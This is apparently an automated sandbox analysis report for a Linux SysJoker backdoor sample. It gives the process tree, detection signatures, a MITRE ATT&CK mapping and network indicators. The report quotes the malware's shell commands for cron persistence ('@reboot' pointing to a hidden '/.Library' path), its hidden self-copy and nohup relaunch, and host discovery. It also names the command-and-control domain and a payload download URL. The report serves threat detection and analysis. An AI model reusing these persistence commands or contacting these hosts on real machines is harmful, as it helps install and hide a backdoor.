Loading ...

Play interactive tourEdit tour

Linux Analysis Report WifCphMYfb

Overview

General Information

Sample Name:WifCphMYfb
Analysis ID:551522
MD5:c805649d6909bf1d7e220f144801044b
SHA1:b21ba8da278b75e1cc515b6e2c84b91be6611800
SHA256:d028e64bf4ec97dfd655ccd1157a5b96515d461a710231ac8a529d7bdb936ff3
Infos:

Detection

SysJoker
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Yara detected SysJoker
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Writes ELF files to hidden directories
Executes the "ifconfig" command used to gather network information
Sample tries to persist itself using cron
Writes ELF files to disk
Creates hidden files and/or directories
Executes the "id" command, possibly to determine if the user is root or not
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "uname" command used to read OS and architecture name
Executes commands using a shell command-line interpreter
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed
Executes the "rm" command used to delete files or directories

Classification

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:551522
Start date:12.01.2022
Start time:09:43:26
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 6s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:WifCphMYfb
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal72.troj.spyw.evad.lin@0/4@10/0

Process Tree

  • system is lnxubuntu20
  • WifCphMYfb (PID: 5200, Parent: 5115, MD5: c805649d6909bf1d7e220f144801044b) Arguments: /tmp/WifCphMYfb
    • sh (PID: 5201, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "id -u"
      • sh New Fork (PID: 5202, Parent: 5201)
      • id (PID: 5202, Parent: 5201, MD5: 36f29256a85dfd77d931750f1335b7ab) Arguments: id -u
    • sh (PID: 5203, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c whoami
      • sh New Fork (PID: 5204, Parent: 5203)
      • whoami (PID: 5204, Parent: 5203, MD5: dbc1888ae50bb5d4d9a7a210d51be710) Arguments: whoami
    • sh (PID: 5205, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | egrep -v \"^(#|$)\" | grep -e \"@reboot (/.Library/SystemServices/updateSystem)\""
      • sh New Fork (PID: 5206, Parent: 5205)
      • crontab (PID: 5206, Parent: 5205, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 5207, Parent: 5205)
      • egrep (PID: 5207, Parent: 5205, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: egrep -v ^(#|$)
      • grep (PID: 5207, Parent: 5205, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -E -v ^(#|$)
      • sh New Fork (PID: 5208, Parent: 5205)
      • grep (PID: 5208, Parent: 5205, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -e "@reboot (/.Library/SystemServices/updateSystem)"
    • sh (PID: 5209, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l; echo \"@reboot (/.Library/SystemServices/updateSystem)\") | crontab -"
      • sh New Fork (PID: 5210, Parent: 5209)
        • sh New Fork (PID: 5212, Parent: 5210)
        • crontab (PID: 5212, Parent: 5210, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 5211, Parent: 5209)
      • crontab (PID: 5211, Parent: 5209, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • sh (PID: 5213, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -rf '/tmp/WifCphMYfb' '/.Library/SystemServices/updateSystem'"
      • sh New Fork (PID: 5214, Parent: 5213)
      • cp (PID: 5214, Parent: 5213, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -rf /tmp/WifCphMYfb /.Library/SystemServices/updateSystem
    • sh (PID: 5215, Parent: 5200, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "nohup '/.Library/SystemServices/updateSystem' >/dev/null 2>&1 &"
      • sh New Fork (PID: 5216, Parent: 5215)
      • nohup (PID: 5216, Parent: 1860, MD5: d8d3ce4d7f4b1e3ac3c3e7c9790f22ca) Arguments: nohup /.Library/SystemServices/updateSystem
      • updateSystem (PID: 5216, Parent: 1860, MD5: c805649d6909bf1d7e220f144801044b) Arguments: /.Library/SystemServices/updateSystem
        • sh (PID: 5217, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "id -u"
          • sh New Fork (PID: 5218, Parent: 5217)
          • id (PID: 5218, Parent: 5217, MD5: 36f29256a85dfd77d931750f1335b7ab) Arguments: id -u
        • sh (PID: 5219, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c whoami
          • sh New Fork (PID: 5220, Parent: 5219)
          • whoami (PID: 5220, Parent: 5219, MD5: dbc1888ae50bb5d4d9a7a210d51be710) Arguments: whoami
        • sh (PID: 5221, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | egrep -v \"^(#|$)\" | grep -e \"@reboot (/.Library/SystemServices/updateSystem)\""
          • sh New Fork (PID: 5222, Parent: 5221)
          • crontab (PID: 5222, Parent: 5221, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5223, Parent: 5221)
          • egrep (PID: 5223, Parent: 5221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: egrep -v ^(#|$)
          • grep (PID: 5223, Parent: 5221, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -E -v ^(#|$)
          • sh New Fork (PID: 5224, Parent: 5221)
          • grep (PID: 5224, Parent: 5221, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -e "@reboot (/.Library/SystemServices/updateSystem)"
        • sh (PID: 5227, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ifconfig | grep -v 127.0.0.1 | grep -E \"inet ([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})\" | awk '{print $2}'"
          • sh New Fork (PID: 5228, Parent: 5227)
          • ifconfig (PID: 5228, Parent: 5227, MD5: 78235087bb226bccf9669e7ea95c0846) Arguments: ifconfig
          • sh New Fork (PID: 5229, Parent: 5227)
          • grep (PID: 5229, Parent: 5227, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v 127.0.0.1
          • sh New Fork (PID: 5230, Parent: 5227)
          • grep (PID: 5230, Parent: 5227, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -E "inet ([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
          • sh New Fork (PID: 5231, Parent: 5227)
          • awk (PID: 5231, Parent: 5227, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "{print $2}"
        • sh (PID: 5232, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ip address | awk '/ether/{print $2}'"
          • sh New Fork (PID: 5233, Parent: 5232)
          • ip (PID: 5233, Parent: 5232, MD5: cd92bd28c8337a4dc4e8b3433befe7e2) Arguments: ip address
          • sh New Fork (PID: 5234, Parent: 5232)
          • awk (PID: 5234, Parent: 5232, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "/ether/{print $2}"
        • sh (PID: 5235, Parent: 5216, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -mrs"
          • sh New Fork (PID: 5236, Parent: 5235)
          • uname (PID: 5236, Parent: 5235, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -mrs
  • dash New Fork (PID: 5275, Parent: 4334)
  • rm (PID: 5275, Parent: 4334, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.GwLI0o1M1z /tmp/tmp.Mgt2LAeGaA /tmp/tmp.W8aNoPij1E
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
WifCphMYfbJoeSecurity_SysJokerYara detected SysJokerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /.Library/SystemServices/updateSystemJoeSecurity_SysJokerYara detected SysJokerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5200.1.00000000a0bbd638.0000000047fd899a.r-x.sdmpJoeSecurity_SysJokerYara detected SysJokerJoe Security
        Process Memory Space: WifCphMYfb PID: 5200JoeSecurity_SysJokerYara detected SysJokerJoe Security

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: WifCphMYfbVirustotal: Detection: 18%Perma Link
          Source: WifCphMYfbReversingLabs: Detection: 16%
          Source: unknownDNS traffic detected: queries for: drive.google.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34804
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36112
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36114
          Source: unknownNetwork traffic detected: HTTP traffic on port 56350 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36106
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36108
          Source: unknownNetwork traffic detected: HTTP traffic on port 34804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36108 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56350
          Source: unknownNetwork traffic detected: HTTP traffic on port 36114 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36112 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36106 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39250 -> 443
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
          Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
          Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
          Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: WifCphMYfb, updateSystem.38.drString found in binary or memory: https://drive.google.com/uc?export=download&id=1-NVty4YX0dPHdxkgMrbdCldQCpCaE-Hn
          Source: WifCphMYfb, 5200.1.00000000242f5d77.00000000815491f4.rw-.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-NVty4YX0dPHdxkgMrbdCldQCpCaE-Hn1
          Source: updateSystem.38.drString found in binary or memory: https://gcc.gnu.org/bugs
          Source: log.txt.43.drString found in binary or memory: https://graphic-updater.com
          Source: classification engineClassification label: mal72.troj.spyw.evad.lin@0/4@10/0

          Persistence and Installation Behavior:

          barindex
          Executes the "crontab" command typically for achieving persistenceShow sources
          Source: /bin/sh (PID: 5206)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
          Source: /bin/sh (PID: 5212)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
          Source: /bin/sh (PID: 5211)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
          Source: /bin/sh (PID: 5222)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
          Writes ELF files to hidden directoriesShow sources
          Source: /usr/bin/cp (PID: 5214)File written to hidden directory: /.Library/SystemServices/updateSystemJump to dropped file
          Sample tries to persist itself using cronShow sources
          Source: /usr/bin/crontab (PID: 5211)File: /var/spool/cron/crontabs/tmp.LgobsfJump to behavior
          Source: /usr/bin/crontab (PID: 5211)File: /var/spool/cron/crontabs/rootJump to behavior
          Source: /usr/bin/cp (PID: 5214)File written: /.Library/SystemServices/updateSystemJump to dropped file
          Source: /tmp/WifCphMYfb (PID: 5200)Directory: /.LibraryJump to behavior
          Source: /bin/sh (PID: 5202)Executable: /usr/bin/id -> id -uJump to behavior
          Source: /bin/sh (PID: 5218)Executable: /usr/bin/id -> id -uJump to behavior
          Source: /usr/bin/egrep (PID: 5207)Grep executable: /usr/bin/grep -> grep -E -v ^(#|$)Jump to behavior
          Source: /bin/sh (PID: 5208)Grep executable: /usr/bin/grep -> grep -e "@reboot (/.Library/SystemServices/updateSystem)"Jump to behavior
          Source: /usr/bin/egrep (PID: 5223)Grep executable: /usr/bin/grep -> grep -E -v ^(#|$)Jump to behavior
          Source: /bin/sh (PID: 5224)Grep executable: /usr/bin/grep -> grep -e "@reboot (/.Library/SystemServices/updateSystem)"Jump to behavior
          Source: /bin/sh (PID: 5229)Grep executable: /usr/bin/grep -> grep -v 127.0.0.1Jump to behavior
          Source: /bin/sh (PID: 5230)Grep executable: /usr/bin/grep -> grep -E "inet ([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"Jump to behavior
          Source: /tmp/WifCphMYfb (PID: 5201)Shell command executed: sh -c "id -u"Jump to behavior
          Source: /tmp/WifCphMYfb (PID: 5203)Shell command executed: sh -c whoamiJump to behavior
          Source: /tmp/WifCphMYfb (PID: 5205)Shell command executed: sh -c "crontab -l | egrep -v \"^(#|$)\" | grep -e \"@reboot (/.Library/SystemServices/updateSystem)\""Jump to behavior
          Source: /tmp/WifCphMYfb (PID: 5209)Shell command executed: sh -c "(crontab -l; echo \"@reboot (/.Library/SystemServices/updateSystem)\") | crontab -"Jump to behavior
          Source: /tmp/WifCphMYfb (PID: 5213)Shell command executed: sh -c "cp -rf '/tmp/WifCphMYfb' '/.Library/SystemServices/updateSystem'"Jump to behavior
          Source: /tmp/WifCphMYfb (PID: 5215)Shell command executed: sh -c "nohup '/.Library/SystemServices/updateSystem' >/dev/null 2>&1 &"Jump to behavior
          Source: /.Library/SystemServices/updateSystem (PID: 5217)Shell command executed: sh -c "id -u"Jump to behavior
          Source: /.Library/SystemServices/updateSystem (PID: 5219)Shell command executed: sh -c whoamiJump to behavior
          Source: /.Library/SystemServices/updateSystem (PID: 5221)Shell command executed: sh -c "crontab -l | egrep -v \"^(#|$)\" | grep -e \"@reboot (/.Library/SystemServices/updateSystem)\""Jump to behavior
          Source: /.Library/SystemServices/updateSystem (PID: 5227)Shell command executed: sh -c "ifconfig | grep -v 127.0.0.1 | grep -E \"inet ([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})\" | awk '{print $2}'"Jump to behavior
          Source: /.Library/SystemServices/updateSystem (PID: 5232)Shell command executed: sh -c "ip address | awk '/ether/{print $2}'"Jump to behavior
          Source: /.Library/SystemServices/updateSystem (PID: 5235)Shell command executed: sh -c "uname -mrs"Jump to behavior
          Source: /bin/sh (PID: 5216)Nohup executable: /usr/bin/nohup -> nohup /.Library/SystemServices/updateSystemJump to behavior
          Source: /usr/bin/dash (PID: 5275)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.GwLI0o1M1z /tmp/tmp.Mgt2LAeGaA /tmp/tmp.W8aNoPij1EJump to behavior
          Source: /bin/sh (PID: 5231)Awk executable: /usr/bin/awk -> awk "{print $2}"Jump to behavior
          Source: /bin/sh (PID: 5234)Awk executable: /usr/bin/awk -> awk "/ether/{print $2}"Jump to behavior
          Source: submitted sampleStderr: no crontab for rootno crontab for root: exit code = 0
          Source: /bin/sh (PID: 5202)Executable: /usr/bin/id -> id -uJump to behavior
          Source: /bin/sh (PID: 5218)Executable: /usr/bin/id -> id -uJump to behavior
          Source: /.Library/SystemServices/updateSystem (PID: 5216)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/sbin/ifconfig (PID: 5228)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/bin/uname (PID: 5236)Queries kernel information via 'uname': Jump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected SysJokerShow sources
          Source: Yara matchFile source: WifCphMYfb, type: SAMPLE
          Source: Yara matchFile source: 5200.1.00000000a0bbd638.0000000047fd899a.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: WifCphMYfb PID: 5200, type: MEMORYSTR
          Source: Yara matchFile source: /.Library/SystemServices/updateSystem, type: DROPPED
          Executes the "ifconfig" command used to gather network informationShow sources
          Source: /bin/sh (PID: 5228)Ifconfig executable: /usr/sbin/ifconfig -> ifconfigJump to behavior
          Source: /bin/sh (PID: 5236)Uname executable: /usr/bin/uname -> uname -mrsJump to behavior

          Remote Access Functionality:

          barindex
          Yara detected SysJokerShow sources
          Source: Yara matchFile source: WifCphMYfb, type: SAMPLE
          Source: Yara matchFile source: 5200.1.00000000a0bbd638.0000000047fd899a.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: WifCphMYfb PID: 5200, type: MEMORYSTR
          Source: Yara matchFile source: /.Library/SystemServices/updateSystem, type: DROPPED

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Scheduled Task/Job1Scripting1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1At (Linux)1At (Linux)1Hidden Files and Directories11LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsScripting1Logon Script (Windows)Logon Script (Windows)File Deletion1Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Linux)1Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

          Malware Configuration

          No configs have been found

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 551522 Sample: WifCphMYfb Startdate: 12/01/2022 Architecture: LINUX Score: 72 74 graphic-updater.com 23.254.131.176, 36106, 36108, 36112 HOSTWINDSUS United States 2->74 76 109.202.202.202, 80 INIT7CH Switzerland 2->76 78 6 other IPs or domains 2->78 80 Multi AV Scanner detection for submitted file 2->80 82 Yara detected SysJoker 2->82 10 WifCphMYfb 2->10         started        12 dash rm 2->12         started        signatures3 process4 process5 14 WifCphMYfb sh 10->14         started        16 WifCphMYfb sh 10->16         started        18 WifCphMYfb sh 10->18         started        20 3 other processes 10->20 process6 22 sh crontab 14->22         started        26 sh 14->26         started        28 sh nohup updateSystem 16->28         started        30 sh cp 18->30         started        32 sh crontab 20->32         started        34 sh egrep grep 20->34         started        36 sh id 20->36         started        38 2 other processes 20->38 file7 70 /var/spool/cron/crontabs/tmp.Lgobsf, ASCII 22->70 dropped 88 Sample tries to persist itself using cron 22->88 90 Executes the "crontab" command typically for achieving persistence 22->90 40 sh crontab 26->40         started        43 updateSystem sh 28->43         started        45 updateSystem sh 28->45         started        47 updateSystem sh 28->47         started        49 3 other processes 28->49 72 /.Library/SystemServices/updateSystem, ELF 30->72 dropped 92 Writes ELF files to hidden directories 30->92 signatures8 process9 signatures10 94 Executes the "crontab" command typically for achieving persistence 40->94 51 sh crontab 43->51         started        54 sh egrep grep 43->54         started        56 sh grep 43->56         started        58 sh ifconfig 45->58         started        66 3 other processes 45->66 68 2 other processes 47->68 60 sh id 49->60         started        62 sh whoami 49->62         started        64 sh uname 49->64         started        process11 signatures12 84 Executes the "crontab" command typically for achieving persistence 51->84 86 Executes the "ifconfig" command used to gather network information 58->86

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          WifCphMYfb19%VirustotalBrowse
          WifCphMYfb0%MetadefenderBrowse
          WifCphMYfb17%ReversingLabsLinux.Trojan.Generic

          Dropped Files

          SourceDetectionScannerLabelLink
          /.Library/SystemServices/updateSystem19%VirustotalBrowse
          /.Library/SystemServices/updateSystem0%MetadefenderBrowse
          /.Library/SystemServices/updateSystem17%ReversingLabsLinux.Trojan.Generic

          Domains

          SourceDetectionScannerLabelLink
          graphic-updater.com11%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://graphic-updater.com11%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          graphic-updater.com
          23.254.131.176
          truetrueunknown
          drive.google.com
          142.250.181.78
          truefalse
            high
            googlehosted.l.googleusercontent.com
            142.250.185.65
            truefalse
              high
              doc-08-2o-docs.googleusercontent.com
              unknown
              unknownfalse
                high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://graphic-updater.comlog.txt.43.drtrueunknown
                https://gcc.gnu.org/bugsupdateSystem.38.drfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  23.254.131.176
                  graphic-updater.comUnited States
                  54290HOSTWINDSUStrue
                  34.249.145.219
                  unknownUnited States
                  16509AMAZON-02USfalse
                  142.250.181.78
                  drive.google.comUnited States
                  15169GOOGLEUSfalse
                  109.202.202.202
                  unknownSwitzerland
                  13030INIT7CHfalse
                  91.189.91.43
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  142.250.185.65
                  googlehosted.l.googleusercontent.comUnited States
                  15169GOOGLEUSfalse
                  91.189.91.42
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse


                  Runtime Messages

                  Command:/tmp/WifCphMYfb
                  Exit Code:0
                  Exit Code Info:
                  Killed:False
                  Standard Output:
                  (crontab -l; echo '@reboot (/.Library/SystemServices/updateSystem)') | crontab -
                  Standard Error:no crontab for root
                  no crontab for root

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  23.254.131.176XTdh56ustBGet hashmaliciousBrowse
                    JGJ5oOtOKbGet hashmaliciousBrowse
                      psO5Q4nOUGGet hashmaliciousBrowse
                        IGFXCUISERVICE.exeGet hashmaliciousBrowse
                          #SysJoker_n2.exeGet hashmaliciousBrowse
                            IGFXCUISERVICE.EXEGet hashmaliciousBrowse
                              867SzVr2XaGet hashmaliciousBrowse
                                34.249.145.219XTdh56ustBGet hashmaliciousBrowse
                                  n3at.x86Get hashmaliciousBrowse
                                    wbFIuLI8b7Get hashmaliciousBrowse
                                      klveP0L6XDGet hashmaliciousBrowse
                                        FHGV5hgJWzGet hashmaliciousBrowse
                                          d6HUyT7qksGet hashmaliciousBrowse
                                            onuEaFOd80Get hashmaliciousBrowse
                                              4RB0OtQooXGet hashmaliciousBrowse
                                                CCxdm3JdixGet hashmaliciousBrowse
                                                  j8iqN51xhIGet hashmaliciousBrowse
                                                    8t688Zcd4gGet hashmaliciousBrowse
                                                      L22bguJLHgGet hashmaliciousBrowse
                                                        WSPqMZoFamGet hashmaliciousBrowse
                                                          FgUO42I5j3Get hashmaliciousBrowse
                                                            FPW3wzk3QLGet hashmaliciousBrowse
                                                              ebqt8DIT7LGet hashmaliciousBrowse
                                                                3wi8LVRVxGGet hashmaliciousBrowse
                                                                  FW0m2y00DvGet hashmaliciousBrowse
                                                                    01Iu8V4PK1Get hashmaliciousBrowse
                                                                      EX8I02o9xUGet hashmaliciousBrowse
                                                                        109.202.202.202XTdh56ustBGet hashmaliciousBrowse
                                                                          n3at.x86Get hashmaliciousBrowse
                                                                            n3at.armGet hashmaliciousBrowse
                                                                              garm7Get hashmaliciousBrowse
                                                                                garmGet hashmaliciousBrowse
                                                                                  JGJ5oOtOKbGet hashmaliciousBrowse
                                                                                    psO5Q4nOUGGet hashmaliciousBrowse
                                                                                      JdOzFkLRpmGet hashmaliciousBrowse
                                                                                        wbFIuLI8b7Get hashmaliciousBrowse
                                                                                          8zkVXtqJFaGet hashmaliciousBrowse
                                                                                            f6cg55YzSXGet hashmaliciousBrowse
                                                                                              0Fmm8Lo2NqGet hashmaliciousBrowse
                                                                                                n8Rjt61UjLGet hashmaliciousBrowse
                                                                                                  ZdsKaURNkSGet hashmaliciousBrowse
                                                                                                    H1FkOdvcMSGet hashmaliciousBrowse
                                                                                                      klveP0L6XDGet hashmaliciousBrowse
                                                                                                        FFgQFaSl2gGet hashmaliciousBrowse
                                                                                                          armGet hashmaliciousBrowse
                                                                                                            ZbIfBGPTv5Get hashmaliciousBrowse
                                                                                                              uo8y0L3Dk0Get hashmaliciousBrowse

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                graphic-updater.comXTdh56ustBGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                JGJ5oOtOKbGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                psO5Q4nOUGGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                IGFXCUISERVICE.exeGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                #SysJoker_n2.exeGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                IGFXCUISERVICE.EXEGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                867SzVr2XaGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176

                                                                                                                ASN

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                HOSTWINDSUSXTdh56ustBGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                JGJ5oOtOKbGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                psO5Q4nOUGGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                #U266c secured VM.5647.htmlGet hashmaliciousBrowse
                                                                                                                • 142.11.222.100
                                                                                                                IGFXCUISERVICE.exeGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                #SysJoker_n2.exeGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                IGFXCUISERVICE.EXEGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                867SzVr2XaGet hashmaliciousBrowse
                                                                                                                • 23.254.131.176
                                                                                                                g6GVx95dFk.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                8ILODCNOM4.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                YjC8YtL5mm.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                AbT54oXloS.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                Pxo6lJ3ixn.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                a5yyNUUUOO.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                1ZXtQq89bt.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                QBPQKYk3Ky.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                drjueN3vt8.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                gxMhx1QlJK.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                G7R312DEIB.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                ZGuKtur9Jp.xlsGet hashmaliciousBrowse
                                                                                                                • 104.168.155.129
                                                                                                                AMAZON-02USXTdh56ustBGet hashmaliciousBrowse
                                                                                                                • 34.249.145.219
                                                                                                                n3at.x86Get hashmaliciousBrowse
                                                                                                                • 34.249.145.219
                                                                                                                jerusalem.x86Get hashmaliciousBrowse
                                                                                                                • 44.241.179.162
                                                                                                                SecuriteInfo.com.Heur.23002.xlsmGet hashmaliciousBrowse
                                                                                                                • 13.58.205.142
